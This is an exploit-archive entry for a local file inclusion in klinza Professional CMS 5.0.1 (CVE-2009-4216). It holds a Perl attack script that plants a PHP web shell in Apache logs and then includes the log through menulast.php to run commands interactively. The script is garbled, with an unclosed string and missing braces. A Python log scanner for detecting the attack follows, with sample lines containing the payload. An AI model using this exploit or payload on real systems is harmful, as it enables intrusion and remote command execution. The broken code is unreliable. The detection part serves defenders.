klinza Professional CMS 5.0.1 - 'menulast.php' Local File Inclusion

Related Vulnerabilities: CVE-2009-4216
Publish Date: 24 Nov 2009
Author: klinza
Source: http://www.securityfocus.com/bid/37127/info

The 'klinza professional cms' project is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects 'klinza professional cms 5.0.1' and prior versions.

#klinza cms <= 5.0.1 Local File Include Exploit
#Discovered by cr4wl3r
#Contact : cr4wl3r[4t]linuxmail[dot]org
use IO::Socket;
use LWP::Simple;

if (@ARGV < 3){
print "
|                 klinza <= 0.0.1 Local File Include Exploit
|               Usage: klinza.pl [target] [path] [apachepath]
|           Example: klinza.pl target.com /LANG/ ../logs/error.log
|                            coded by : cr4wl3r


print "Injecting code in log files...\n";
$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
print $socket "User-Agent: ".$CODE."\r\n";
print $socket "Host: ".$host."\r\n";
print $socket "Connection: close\r\n\r\n";
print "Write END to exit!\n";
print "IF not working try another apache path\n\n";

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "END") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Connect Failed.\n\n";
    print $socket "GET ".$path."/funzioni/lib/menulast.php?LANG=".$apache[$apachepath]."&cmd=$cmd HTTP/1.1\r\n";
    print $socket "Host: ".$host."\r\n";
    print $socket "Accept: */*\r\n";
    print $socket "Connection: close\r\n\n";

    while ($raspuns = <$socket>)
        print $raspuns;

    print "[shell] ";
    $cmd = <STDIN>;
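For defenders, the following added example (not part of the original advisory or the exploit above) scans Apache combined-format access log lines for the two steps the exploit performs: a PHP open tag planted in the request line or User-Agent (log poisoning), and a request to 'funzioni/lib/menulast.php' whose LANG parameter points outside the language directory (the include itself). The log lines are constructed samples, not real captures.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache "combined" log format (not from the advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [24/Nov/2009:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [24/Nov/2009:10:00:02 +0000] "GET /LANG/<?php%20system($_COOKIE[cmd]);?> HTTP/1.1" 404 210 "-" "<?php system($_COOKIE[cmd]);?>"
10.0.0.7 - - [24/Nov/2009:10:00:03 +0000] "GET /funzioni/lib/menulast.php?LANG=../../logs/error.log&cmd=id HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.9 - - [24/Nov/2009:10:00:04 +0000] "GET /funzioni/lib/menulast.php?LANG=it HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)
# A PHP open tag in any logged field is the signature of log poisoning (may also hit "<?xml").
PHP_TAG = re.compile(r'<\?(php|=)?', re.IGNORECASE)
# Values a language selector should never carry: traversal, system paths, wrappers, log files.
SUSPICIOUS_LANG = re.compile(r'(\.\./|\.\.\\|/etc/|/proc/|php://|\.log$)', re.IGNORECASE)
VULNERABLE_SCRIPT = '/funzioni/lib/menulast.php'

def analyze_line(line):
    """Return (client_ip, [findings]) for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    req, ua = m.group('req'), m.group('ua')
    if PHP_TAG.search(unquote(req)) or PHP_TAG.search(unquote(ua)):
        findings.append('log_poisoning')
    parts = req.split(' ')
    target = parts[1] if len(parts) >= 2 else ''
    url = urlsplit(target)
    if url.path.endswith(VULNERABLE_SCRIPT):
        # parse_qs percent-decodes values once, so encoded traversal is caught as well
        for value in parse_qs(url.query).get('LANG', []):
            if SUSPICIOUS_LANG.search(value):
                findings.append('lfi_attempt')
                break
    return (m.group('ip'), findings)

def scan(log_text):
    """Return (ip, findings) only for lines that produced at least one finding."""
    alerts = []
    for line in log_text.splitlines():
        result = analyze_line(line)
        if result and result[1]:
            alerts.append(result)
    return alerts

if __name__ == '__main__':
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, ', '.join(findings))
```

Correlating a poisoning hit and a later LFI hit from the same client, as the two flagged lines above show, is the pattern worth alerting on; a traversal string in LANG alone is already enough to block at the web server or WAF.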